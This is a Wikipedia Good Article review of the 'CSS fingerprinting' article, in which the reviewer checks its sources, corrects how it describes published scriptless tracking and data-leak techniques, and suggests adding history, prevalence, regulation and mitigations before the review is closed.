Jump to content

Talk:CSS fingerprinting/GA1

Page contents not supported in other languages.
From Wikipedia, the free encyclopedia

GA review

[edit]

Article (edit | visual edit | history) · Article talk (edit | history) · Watch

Nominator: Sohom Datta (talk · contribs) 23:36, 18 January 2026 (UTC)[reply]

Reviewer: Esculenta (talk · contribs) 16:29, 21 February 2026 (UTC)[reply]


Hi, I'll review this article. Will have comments here in the next few days. Esculenta (talk) 16:29, 21 February 2026 (UTC)[reply]

Spot checks

  • Unsupported/overbroad claim ("user-generated content"): The sentence asserting that style sheets are "typically allowed in user-generated content" (used to argue "larger reach") does not seem to be stated in the Trampert et al. paper, which focuses on HTML emails and other contexts, not UGC in general.
  • Overstrong conclusion ("larger reach"): The source supports that CSS-based techniques can work where JavaScript is disabled (including email contexts), but the draft's "larger reach" wording reads like a sweeping conclusion. Consider attributing/qualifying it (e.g., "can apply in contexts where JavaScript is disabled") rather than stating it as a settled fact.
  • Technique example slightly misaligned: "font retrieval on a media query" is not how the source frames it; it discusses conditional group rules and @font-face multi-source behaviour.
  • Misattributed mechanism in font section: The sentence about applying 'font-family' directly and measuring element size to infer installed fonts/apps reads like it is supported by the font-metrics literature already cited, but doesn't cleanly match Trampert et al.'s described method (container queries / computed-size comparisons).
  • calc() wording overstates/frames incorrectly: The source supports that 'calc()' evaluation differences can help distinguish architectures/platform-browser combinations, but "reveal the instruction set and precision of the underlying operating system" is sloppy/overstated. Better to frame it as differences in browser/engine/platform evaluation that can help infer architecture (e.g., ARM vs x86-64) and browser/OS pairs.
  • Uniqueness claim needs qualification: "uniquely identify users based on their installed extensions" is plausible, but is stronger than what Trampert et al. explicitly claims/quantifies in the cited discussion. Safer wording would be "can contribute to a unique fingerprint" unless another source is cited for uniqueness.
  • "Another font-based attack proposed by Heiderich et al. in 2017" the paper is from 2012
  • "…loading specially prepared fonts where the glyphs for a set of letters had been swapped out for zero-width glyphs." This is imprecise. Heiderich et al. describe a "one font per character" approach: each font makes one chosen character render with a distinctive width, while other characters in that font effectively render at zero width. The article should reflect that framing rather than implying a glyph-swap scheme. More importantly, the exfiltration doesn't use "height/width queries" (which implies Media Queries); it uses a layout side-channel. The attack forces a line-break or scrollbar to appear based on the character's width, then uses CSS selectors (like ::-webkit-scrollbar) to trigger a background-image request. I suggest rewriting this to distinguish between declarative queries (like @media) and layout-driven side-channels.
  • "Using a series of CSS animations and height/width queries, the attacker can infer the heights of the characters … making it possible to leak the data … character by character." Source (pp. 764–766): Uses a CSS animation that shrinks a container and relies on line breaks + scrollbar appearance, then a side channel via WebKit scrollbar state selectors/background loads. Problem: The draft's "height/width queries" and "infer the heights of the characters" framing doesn’t match what the paper describes (scrollbar/line-break/side-channel behaviour). "Character by character" is loosely compatible with the "one font per character" approach, but the explanation given is off.
  • "An attacker can craft code to register a CSS selector that gets activated only when a user types a specific string into an input field … [and] … could also be used as a keylogger …" Source (p. 763): The paper does say they "implemented a scriptless keylogger … capture keystrokes … even when JavaScript is disabled", and elsewhere notes SVG can "intercept … keystrokes … without using scripting technologies." Problem: The draft's detailed mechanism (CSS selectors triggering on typed strings + background-image exfiltration) is not supported by the cited page. What's supported is the existence of a scriptless keylogger concept/PoC and the broader point that scriptless techniques can capture keystrokes without JS; the "how" in the draft needs either a different source or rewriting to match what Heiderich et al. actually say.
  • all info sourced to Lin, Araujo, Taylor, Jang (2023) is broadly supported, but it seems the page numbers are off in some instances. For example, "Media queries are a set of CSS directives that allow a website to query different properties about a screen such as the height, width or whether the user is in a printing interface. Media queries allow websites to conditionally apply CSS styles if a particular set of conditions are met." (cited to Lin 2023 p=991) but it seems the relevant explanation is on p. 989. Another example: "Other features available to CSS include whether or not JavaScript is enabled and scrollbar settings, particularly on macOS." (cited to Lin 2023 p=993,994), but it seems the info is on other pages; (p.990): "We detect if JavaScript is disabled by wrapping an HTML element inside the <noscript> tag…" and (p.994): "Scrollbar Settings (OS X)" appears as a fingerprinting attribute in their evaluation table. Another: "...media queries… background-image… makes a request to a remote URL… with the choice of image conveying information…" (cited to Lin 2023 p=992,1002), but the background-image callback mechanism is discussed on paper p.989, not p.992/1002.
  • Extension-detection paragraph blends methods and overstates uniqueness: With Trampert et al. (2025) + Laperdrix et al. (2021) cited, the general idea (extensions inject styles/DOM; this can be detected and used for fingerprinting) and the Wikiwand example are covered, but the paragraph reads like one coherent workflow ("Wikiwand → CSS container queries → compare against a fingerprint database → uniquely identify users") that neither source presents as such. Laperdrix's detection relies on script reading computed style effects, while Trampert demonstrates CSS-only/container-query probing; and "uniquely identify users" is phrased too absolutely — better framed as "can contribute to uniquely identifying users / increase identifiability."


  • Assessment of WIAGA criterion 1a+b. Overall: readable for a technically minded reader, but it's not yet consistently clear for a broad audience. A few sentences are clunky, and some jargon is dropped in without a plain-English gloss.
  • Jargon density without quick glosses: terms like stateless, exfiltration, conditional networking request, container queries, image-set, @supports, and calc() are used as if the reader already knows them. GA doesn't require hand-holding, but the article should define/briefly explain each the first time it matters (one short clause is enough).
  • Awkward/ambiguous phrasing in the lead: "It leverages differences across browsers, or CSS queries …" reads like two different things are being compared. You want something more direct: "It uses CSS features (such as media queries) and differences between browser implementations…"
  • The lead currently does not clearly summarise the structure of the article (but this is best saved until last pending the possible addition of further info).
  • Assessment of WIAGA criterion 3a ("broad in its coverage"). I think there's some aspects that are thin or missing:
  • The article presents techniques as a flat catalogue without any chronological development. The :visited history-sniffing attack and its patching (pre-2010) is arguably an important precursor that contextualises the shift to the techniques described here.
  • Real-world prevalence is completely absent. The article currently has zero sourced statements about whether any of these techniques have been observed in the wild, how widespread CSS-based tracking actually is, or whether these remain primarily academic demonstrations.
  • Legal/regulatory dimension. There's no mention of how CSS fingerprinting intersects with privacy regulations (GDPR, ePrivacy Directive, etc.), which treat fingerprinting as equivalent to cookies for consent purposes. Even a brief mention would help breadth.
  • The Example section is very narrow. It only demonstrates the simplest technique (media-query width detection), which doesn't demonstrate what makes CSS fingerprinting distinctive or concerning. The more novel techniques (font probing, calc() architecture detection, extension detection) go unillustrated.
  • Defences/mitigations and current status. The article mentions "defences limit JavaScript" as motivation, but it doesn't cover what defenders actually do about CSS-based attacks (browser changes, client hardening, email sanitisation, CSP-like restrictions, limiting external loads, blocking conditional loads, disabling remote fonts/images in email, etc.). For a security/privacy technique, a short "Mitigations" section would help the breadth. This could cover stuff like
  • Browser-level fixes: Mention how some browsers attempt to reduce font-based fingerprinting by limiting access to local fonts and/or standardising font-related measurements.
  • Email Client Sanitization: Many email clients reduce tracking risk by limiting or rewriting external resource loads (for example, proxying or blocking remote images/fonts by default) and constraining which CSS constructs are honoured in email rendering.
  • Content Security Policy (CSP): Discuss how img-src or font-src directives can prevent CSS from making unauthorized external requests.
  • The article reads like "these attacks exist", but not "how much this matters": are these mostly academic PoCs, seen in the wild, used by trackers, or primarily a risk in email contexts? Even two or three sourced sentences would round this out.
  • Definition boundary / relationship to neighbouring topics. It would help to distinguish CSS fingerprinting from (a) general browser fingerprinting, (b) "CSS exfiltration"/scriptless data theft, and (c) "style-based fingerprinting" (Lin et al.'s implicit styling fingerprints are related but not identical in framing). Right now the Techniques section drifts into scriptless exfiltration generally.
  • Practical Constraints: The article presents these attacks as highly effective, but lacks context on their "cost." Based on Takei et al. (2015) and later surveys, CSS-only fingerprinting often requires massive payloads (frequently >1MB of CSS) to probe for enough system variables to be useful. This makes the attack conspicuous in network logs and slows down page rendering, which limits its "in the wild" utility compared to JavaScript. Adding a sentence on the bandwidth-to-entropy trade-off would improve the article's balance.
  • criterion 3b ("it stays focused on the topic") I think maybe the article blurs fingerprinting vs exfiltration/keylogging. Extension detection and font presence are clearly fingerprinting. The keystroke/keylogger material is closer to "scriptless data exfiltration" than fingerprinting per se unless it is explicitly tied back ("these same CSS-only channels can also leak interaction data"). As written, it feels like a bit of a tangent.
  • other sources? I had a look around for other sources that might be useful. These are not requirements for inclusion, but rather, suggestions on how the current article info could be fleshed out.
  • This source explicitly treats CSS fingerprinting as giving more limited data than JavaScript-heavy methods, and summarises practical constraints such as scalability/bandwidth cost in Takei-style approaches (large CSS payloads per request) and brute-force font probing being visible in network traffic. It summarises the pre-2010 :visited history-sniffing issue, notes it was patched, and then frames the shift to later CSS-only approaches (Takei et al. 2015). That's a possible "how we got here" bridge that the current draft doesn't really have.
  • This article (same author) also recaps the pre-2010 :visited link-history leak, notes it was patched, then points to the later move to CSS-only fingerprinting via @media-driven URL fetches (Takei et al. 2015), which would help readers see how CSS-based approaches evolved. It explicitly frames CSS fingerprinting (Takei-style) as providing limited data unless combined with other passive signals (e.g., header attributes), and it gives concrete practicality limits: scalability/bandwidth cost (example: >1 MB CSS per request in a cited GitHub implementation) and the fact that font probing is brute-force and can be conspicuous in network traffic. Table I gives an at-a-glance evaluation of CSS fingerprinting (low uniqueness/entropy in their assessment) and a simple defence line ("limit or disable CSS fingerprinting through extensions or scripts"). Even if you keep it cautious/attributed ("one survey rates …"), it gives you a secondary-source foothold to cover defences, which is currently a gap.
  • This source might have a few useful bits to add:
  • it explicitly points out that "browser fingerprinting" is used two ways in the literature (browser identification vs user re-identification) and says their work uses the browser-identification meaning. That would help readers understand why some "CSS fingerprinting" papers look different from the scriptless-tracking framing.
  • It adds a technique family the current article doesn't cover well: CSS feature-support fingerprinting (Techniques): it describes fingerprinting based on supported CSS properties, selectors, and filters, including vendor-prefix differences across engines (their Table I) and examples like -moz- vs -webkit-.
  • it explains a common implementation approach: set CSS values on an element, then use JavaScript to inspect the element's style object and returned values (including cross-browser differences in how composite properties are serialised). This is a different branch of CSS fingerprinting than the "conditional URL request" side channel the article focuses on.
  • it provides an explicit set of 23 CSS properties and test values used for fingerprinting (Table IV).
  • it uses browser/CSS fingerprinting as part of a server-side session hijacking prevention framework (SHPF), i.e., a defensive/security motivation rather than tracking. That would broaden coverage without going off-topic.
  • One caveat for integration: their "CSS fingerprinting" implementation relies on JavaScript to read out support/values, so it should be presented as a different class of CSS fingerprinting from the scriptless/email attack line that's been built from Trampert et al.
  • Images: a lack of images is not surprising for a topic like like, but I suggest that a conceptual diagram (e.g. vector flowchart) of the CSS exfiltration loop would be valuable.

Ok, there's a bit to think about. Drop a ping when you're ready for me to take another look. Esculenta (talk) 17:44, 23 February 2026 (UTC)[reply]

No engagement with (or acknowledgment of) the review (despite nominator activity), so shutting this down. Esculenta (talk) 17:49, 2 March 2026 (UTC)[reply]

Hey, sorry I was out for a while on vacation last week, just came back yesterday -- I was planning on working on it over this week! Sorry about that, if you are okay, I'd still like to continue the review informally, even if I don't necessarily get a GA out of it! Sohom (talk) 18:06, 2 March 2026 (UTC)[reply]
I'm going to be avoiding anything GA-related for a while, so hopefully the comments will be of use for you to upgrade the article, and I wish you success with a future reviewer! Esculenta (talk) 18:12, 2 March 2026 (UTC)[reply]